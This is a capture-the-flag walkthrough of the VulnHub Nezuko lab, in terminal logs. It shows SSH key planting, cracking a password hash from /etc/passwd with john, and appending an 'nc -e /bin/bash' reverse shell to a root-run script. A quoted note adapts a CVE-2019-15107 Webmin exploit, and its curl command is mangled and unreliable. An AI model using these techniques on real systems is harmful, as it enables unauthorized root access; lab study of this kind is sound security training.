
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh-keygen -t rsa    
Generating public/private rsa key pair.
Enter file in which to save the key (/home/pinginglab/.ssh/id_rsa): sshkey
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in sshkey
Your public key has been saved in sshkey.pub
The key fingerprint is:
SHA256:YyAJh37bhxAcyQPLL9V6SEPXlz2xgHrBlpJkLsD7i4o pinginglab@pinginglab
The key's randomart image is:
+---[RSA 3072]----+
| .+=++++ o.o..   |
| .o***o B o.o.   |
| .o.Bo++ o  ..   |
|  o+o*...        |
|  .o++.oS        |
|   .o.o...       |
|   . . .         |
|. . .            |
|E.               |
+----[SHA256]-----+
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ls                              
 47230.rb  'shell1 copy.sh'   shell1.sh   sshkey   sshkey.pub
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat sshkey.pub       
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab
                                                
                                                
                                      
                                      cat /home/nezuko/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDL6dNXCdbpYWynuXtPoTnuye9/isxXsiIBC1dqL/JWBulE7ebQSWOaIe1AW3P+m0zaWSttxIG3Yv+66vGiZ8vYkOz2IqiBhKPmhUA5MfAvjZ+13yGLFAnWymIGAz/XEE3fU/8K3WLB9J058WOG9pDFGDYhS0fwr+/g99tFI3dGyw0eWEdaX0l8FSuN1HSA53xM8cO6Manx4409cXuCbPy0xX6xFMOFfeZMmzCEUXLp3U/ofB8yzLVv+7gTRaxIgZ7EJgxGfBgFf3jLnZJW4G4YiNtMK7BSSau8C2Kt+5Sq0bmM9+GjsUFLQWHUHMmSo2tO/eYuJZnZVkKt1HOwnjjBLgqUWrbDzsuk8qEXzhFH8W7qIZqb3dEDLLnqDZ2QH3dBxVFAYCq6sTvoS5AB16WplDKLLV4JRdfps3rZOJ7GXlIkcfkyq+3L3FdTrY83FX4ZrSSat1/uUouYdHfVbOi9/xfXUn7UnjmdCQTxoOIZvdHnztGHbt4cazGwd/AwW2E= pinginglab@pinginglab 


image-20230115213203287

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ ssh -i sshkey nezuko@192.168.219.180                        
The authenticity of host '192.168.219.180 (192.168.219.180)' can't be established.
ED25519 key fingerprint is SHA256:2Ru1IBosCTKF6TvCVfZdwFwIaEjQloQOwvpfhwVTi04.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.180' (ED25519) to the list of known hosts.
Warning: SSH client configured for wide compatibility by kali-tweaks.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

404 packages can be updated.
189 updates are security updates.

New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ ls
from_zenitsu  nezuko.txt
nezuko@ubuntu:~$ pwd
/home/nezuko
nezuko@ubuntu:~$ cd /home
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ sudo su zenitsu
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
Sorry, try again.
[sudo] password for nezuko: 
sudo: 2 incorrect password attempts
nezuko@ubuntu:/home$ ls
nezuko  zenitsu
nezuko@ubuntu:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin

crack hash:

┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txrt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt 
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ echo  "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
                                                                                   
                                                        
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john - zenhash.txt
Completing option
--bare-always-valid                      -- treat bare hashes as valid (Y/N)     
--config                -c               -- use config                           
--costs                                  -- load salts with(out) cost value Cn (t
--crack-status                           -- emit a status line whenever a passwor
--device                                 -- set OpenCL device (list using --list=
--dupe-suppression                       -- suppress all dupes in wordlist (and f
--dupe-suppression                       -- suppress all dupes in wordlist (and f
--external                               -- external mode or word filter         
--field-separator-char                   -- use "C" instead of ":" in input and p
--fork                                   -- fork N processes                     
--format                                 -- use specific format                  
--groups                                 -- do not load these group only         
--help                  -h               -- display help                         
-i                                       -- specify: -[incremental mode]         
--incremental           -i                                                     
--incremental           -i               -- incremental mode                     
--input-encoding        --encoding       -- input data is non-ascii (eg. UTF-8, I
--internal-codepage                      -- codepage used in rules/masks         
--keep-guessing                          -- try finding plaintext collisions     
--length                                 -- shortcut for --min-len=N --max-len=N 
--list                                   -- list capabilities                    
--log-stderr                             -- log to screen instead of file        
--loopback              --loopback       -- like --wordlist, but fetch words from
--make-charset                           -- make a charset file. It will be overw
--markov                --markov         -- markov mode                          
--mask                                   -- mask mode using MASK (or default from
--max-candidates                         -- gracefully exit after this many candi
--max-length                             -- request a maximum candidate length in
--max-run-time                           -- gracefully exit after this many secon
--max-run-time                           -- gracefully exit after this many secon
--mem-file-size                          -- size threshold for wordlist preload (
--min-length                             -- request a minimum candidate length in
--mkpc                                   -- request a lower max. keys per crypt  
--mkv-stats                              -- markov stats file (see doc/MARKOV)   
--node                                   -- this node's number range out of TOTAL
--no-keep-guessing                       -- do not try finding plaintext collisio
--no-log                                 -- disables creation and writing to john
--no-mask                                -- used with --test for alternate benchm
--pipe                                   -- read from pipe/stdin but with rules  
--platform                               -- set OpenCL platform                  
--pot                                    -- pot file to use                      
--prince                                 -- PRINCE mode, read words from FILE    
--prince-case-permute                    -- permute case of first letter         
--prince-elem-cnt-max                    -- maximum number of elements per chain 
--prince-elem-cnt-min                    -- minimum number of elements per chain 
--prince-keyspace                        -- just show total keyspace that would b
--prince-limit                           -- limit number of candidates generated 
--prince-loopback                        -- fetch words from a .pot file         
--prince-mmap                            -- memory-map infile (not available with
--prince-skip                            -- initial skip                         
--prince-wl-dist-len    --prince-wl-max  -- calculate length distribution from wo
--progress-every                         -- emit a status line every N seconds   
--regen-lost-salts                       -- regenerate lost salts (see doc/OPTION
--regen-lost-salts                       -- brute force unknown salts            
--reject-printable                       -- reject printable binaries            
--restore               --restore        -- restore an interrupted session       
--rules                 -r               -- use rule                             
--rules-skip-nop                         -- skip any NOP ":" rules (you already r
--rules-stack                            -- stacked rules                        
--salts                                  -- load salts with(out) COUNT (to MAX) h
--save-memory                            -- Enable memory saving, at LEVEL 1..3  
--session               --session        -- give a new session the NAME          
--show=LEFT             --show           -- show cracked passwords (if =LEFT, the
--single                                 -- use single crack mode                
--single-retest-guess                    -- override config for SingleRetestGuess
--single-seed                            -- add static seed words for all salts i
--single-wordlist                        -- short wordlist with static seed words
--skip-self-tests                        -- skip self tests                      
--status                --status         -- print status of a session            
--stdout                --stdout         -- just output candidate passwords      
--stress-test                            -- loop self tests forever              
--subformat                              -- pick a benchmark format for --format=
--subsets                                -- "subsets" mode (see doc/SUBSETS)     
--subsets-max-diff                       -- Maximum unique characters in subset  
--subsets-min-diff                       -- Minimum unique characters in subset  
--subsets-required                       -- The N first characters of "subsets" c
--test-full                              -- run more thorough self-tests         
--tuning                                 -- tuning options (auto/report/N)       
--users                                  -- do not load these users only         
--verbosity                              -- change verbosity (1-5 or 6 for debug,
--wordlist              -w                                                     
--wordlist              -w               -- use wordlist                         
-w
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist = /usr/share/wordlists/rockyou.txt  zenhash.txt
stat: =: No such file or directory
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt 
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt  zenhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meowmeow         (?)     
1g 0:00:00:00 DONE (2023-01-15 21:27) 1.030g/s 3694p/s 3694c/s 3694C/s asdf1234..fresa
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                   
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ 

meowmeow

switch user:

nezuko@ubuntu:/home$ su zenitsu
Password: 
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ ls
nezuko  zenitsu
zenitsu@ubuntu:/home$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:/home$ cd zenitsu/
zenitsu@ubuntu:~$ ls
to_nezuko  zenitsu.txt
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls
send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$ ls -al
total 12
drwxr-xr-x 2 zenitsu root    4096 Ogos 21  2019 .
drwxr-xr-x 4 zenitsu zenitsu 4096 Ogos 21  2019 ..
-rw-r--r-- 1 zenitsu root     150 Ogos 21  2019 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ echo  "nc -e /bin/bash 192.168.219.177 5555" >> send_message_to_nezuko.sh 
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh 
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 192.168.219.177 5555
zenitsu@ubuntu:~/to_nezuko$ 

image-20230115213639971

third flag

┌──(pinginglab㉿pinginglab)-[~]
└─$ nc  -lnvp 5555
listening on [any] 5555 ...

id
id
id
id
id
id
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 41430
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
snap
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat

.................                                                                                          ..........................                  ........
................                                                                                            ........................                   ........
...............                                     ...   .       .                                         ........................                   ........
      .  ... ..                                 ...............................                             ........................                   ........
.    ...........                             ....................................                          .........................                   ........
.  ... .........                          .................,,,,,,,,.................                       .........................                   ........
       .. ......                         ..............,,,,,,,,,,,,,,,,,,............                      .........................                   ........
.       .   ....                        ...........,,,,,,,,,,,,,,,,,,,,,,,,,,.........                      ........................                    ..... .
              .                        .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........                        ......................                    .......
      .  . .                          .......,,,,,,,,,,,,,,,,,,******,*********,.......                        .....................                    .......
          .                          .....,,,,,,,,,,,,,,***,**********************......                          ..................                    .......
                                   ....,,,,,,,,,,***********************************.....                          .................                    .... ..
                                  ...,,,,*********************************************.....                       ..................                    . .....
                                ....**********,.    .,*****************,       ,********....                      ..................                    . .....
                               ...******,  ,***************************************. *****...                     ..................                       .. .
                              ...*** .**************,***********************************,,*,..                    ..................                        ...
                             ..,.,******************.,*****************,..,*****************,.                  ................. .                       .    
                             ..**************,,,.......***************,.,......,*************.                 ............... ...                             
                             .**********************,,,,*************,,.*********************,                ................ .. .                            
                             .**********          .***.,,************,***.            ,.******               .............                                     
                              ******     *(###(/,   **/*,,**********   ,(#####(*     *              ..............                                     
                              ,***    ,##########/,, **///*...,##########(,..  .,/              ...  ..                                            
                               ***..,..,,,,,,,,,,,,/,*///..,,,*****,,,,*,,.//*             ..  ....       .                                    
                                //.............//............../*                ..... ..                                          
                                 *.            ///            .((//,                 ..                                                
                                  ,,          ///(,           ((//. .                                                                  
                                   *//.*// ...  **.///./ ...... //.//..                                                                    
                                    ///,/ .                                                                    
                                     /*,,/// .                                                                     
                                  ,. .///,,,,//,...,                                                                   
                                 , ,,.*///*,,//,,, ,                                                                   
                                 ,,.,,/,/ ,.                                                                   
                                    ,/,///*/                                                                       
                                     */                                                                        
                                      .///,,//                                                                         
                                        .............,//*                                                                          
                                          ///,,,,//                                                                            
                                            **,,,                                                                              
                                         .,, , ///.,,,,,.                                                                          
                                       /,,,, /,,, *..,,/..,,,/                                                                         
                                       /*,,,,,,,,.,.  //  ,.,,,,,,,,,/                                                                         
                                       ,//,,,,,,,,,,,,,,, ,/.,,,,,,,,,,,,,,//                                                                          
                                          *,,,,,,,,,...,,,,,,.   ,,,,,,,,..,,,,,,,.  .//,                                                                      
                                    */*.        .,,,,,,,,,,.,,.,,.,,,,,,,,,,,.       ,**/***                                                                   


3ca33b8158d9dee5c35a7d6d793c7fd5


other escape

image-20230115215233660

image-20230115215246677

image-20230115215842807

image-20230115215854321

using:

https://www.bilibili.com/read/cv3530863/

然后改一下poc.sh这个脚本,把脚本里面执行echo '$FLAG’的那一段,改成nc -e /bin/bash attack_ip port就好了,改好之后就是这样的:

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks KaTeX parse error: Expected 'EOF', got '&' at position 41: … -d 'user=wheel&̲pam=&expired=2&…URI’/session_login.cgi’|grep $FLAG>/dev/null 2>&1

作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

NEZUKO: 1——202201152003 的相关文章

  • ansible 重新启动 2.1.1.0 失败

    我一直在尝试创建一个非常简单的 Ansible 剧本 它将重新启动服务器并等待它回来 我过去在 Ansible 1 9 上有一个可以运行的 但我最近升级到 2 1 1 0 并且失败了 我正在重新启动的主机名为 idm IP 为 192 16
  • Unix 命令列出包含字符串但*不*包含另一个字符串的文件

    如何递归查看包含一个字符串且不包含另一个字符串的文件列表 另外 我的意思是评估文件的文本 而不是文件名 结论 根据评论 我最终使用了 find name html exec grep lR base maps xargs grep L ba
  • awk 子串单个字符

    这是columns txt aaa bbb 3 ccc ddd 2 eee fff 1 3 3 g 3 hhh i jjj 3 kkk ll 3 mm nn oo 3 我可以找到第二列以 b 开头的行 awk if substr 2 1 1
  • 无法加载 JavaHL 库。- linux/eclipse

    在尝试安装 Subversion 插件时 当 Eclipse 启动时出现此错误 Failed to load JavaHL Library These are the errors that were encountered no libs
  • 如何检测并找出程序是否陷入死锁?

    这是一道面试题 如何检测并确定程序是否陷入死锁 是否有一些工具可用于在 Linux Unix 系统上执行此操作 我的想法 如果程序没有任何进展并且其状态为运行 则为死锁 但是 其他原因也可能导致此问题 开源工具有valgrind halgr
  • 如何禁用 GNOME 桌面屏幕锁定? [关闭]

    Closed 这个问题不符合堆栈溢出指南 help closed questions 目前不接受答案 如何阻止 GNOME 桌面在几分钟空闲时间后锁定屏幕 我已经尝试过官方手册了在红帽 https access redhat com doc
  • nginx 上的多个网站和可用网站

    通过 nginx 的基本安装 您的sites available文件夹只有一个文件 default 怎么样sites available文件夹的工作原理以及如何使用它来托管多个 单独的 网站 只是为了添加另一种方法 您可以为您托管的每个虚拟
  • 如何在 shell 脚本中并行运行多个实例以提高时间效率[重复]

    这个问题在这里已经有答案了 我正在使用 shell 脚本 它读取 16000 行的输入文件 运行该脚本需要8个多小时 我需要减少它 所以我将其划分为 8 个实例并读取数据 其中我使用 for 循环迭代 8 个文件 并在其中使用 while
  • Linux中的CONFIG_OF是什么?

    我看到它在很多地方被广泛使用 但不明白在什么场景下我需要使用它 What is 配置 OF OF 的全名是什么 打开固件 这是很久以前发明的 当时苹果公司正在生产基于 PowerPC CPU 的笔记本电脑 而 Sun Microsystem
  • 在哪里可以找到并安装 pygame 的依赖项?

    我对 Linux 比较陌生 正在尝试安装 python 的 pygame 开发环境 当我运行 setup py 时 它说我需要安装以下依赖项 我找到并安装了其中之一 SDL 然而 其他人则更加难以捉摸 Hunting dependencie
  • 如何在数组中存储包含双引号的命令参数?

    我有一个 Bash 脚本 它生成 存储和修改数组中的值 这些值稍后用作命令的参数 对于 MCVE 我想到了任意命令bash c echo 0 0 echo 1 1 这解释了我的问题 我将用两个参数调用我的命令 option1 without
  • 如何使用GDB修改内存内容?

    我知道我们可以使用几个命令来访问和读取内存 例如 print p x 但是如何更改任何特定位置的内存内容 在 GDB 中调试时 最简单的是设置程序变量 参见GDB 分配 http sourceware org gdb current onl
  • linux perf:如何解释和查找热点

    我尝试了linux perf https perf wiki kernel org index php Main Page今天很实用 但在解释其结果时遇到了困难 我习惯了 valgrind 的 callgrind 这当然是与基于采样的 pe
  • 尝试安装 LESS 时出现“请尝试以 root/管理员身份再次运行此命令”错误

    我正在尝试在我的计算机上安装 LESS 并且已经安装了节点 但是 当我输入 node install g less 时 出现以下错误 并且不知道该怎么办 FPaulMAC bin paul npm install g less npm ER
  • Discord.net 无法在 Linux 上运行

    我正在尝试让在 Linux VPS 上运行的 Discord net 中编码的不和谐机器人 我通过单声道运行 但我不断收到此错误 Unhandled Exception System Exception Connection lost at
  • PHP 从命令行启动 gui 程序,但 apache 不启动

    首先 我阅读了有类似问题的人的一些帖子 但所有答案都没有超出导出 DISPLAY 0 0 和 xauth cookies 这是我的问题 提前感谢您的宝贵时间 我开发了一个小库 它使用 OpenGL 和 GLSL 渲染货架 过去几天我将它包装
  • NPTL 和 POSIX 线程有什么区别?

    NPTL 和 POSIX 线程之间的基本区别是什么 这两者是如何演变的 POSIX 线程 pthread 不是一个实现 它是几个函数的 API 规范 纸上的标准 英文 其名称以pthread 以及定义在
  • 如何在apache 2.4.6上安装apxs模块

    我刚刚用过apt get update我的 apache 已更新为2 4 6 我想安装 apxs 来编译模块 但收到此错误 The following packages have unmet dependencies apache2 pre
  • 使用 sh 运行 bash 脚本

    我有 bash 脚本 它需要 bash 另一个人尝试运行它 sh script name sh 它失败了 因为 sh 是他的发行版中 dash 的符号链接 ls la bin sh lrwxrwxrwx 1 root root 4 Aug
  • jpegtran 优化而不更改文件名

    我需要优化一些图像 但不更改它们的名称 jpegtran copy none optimize image jpg gt image jpg 但是 这似乎创建了 0 的文件大小 当我对不同的文件名执行此操作时 大小仍然完全相同 怎么样 jp

随机推荐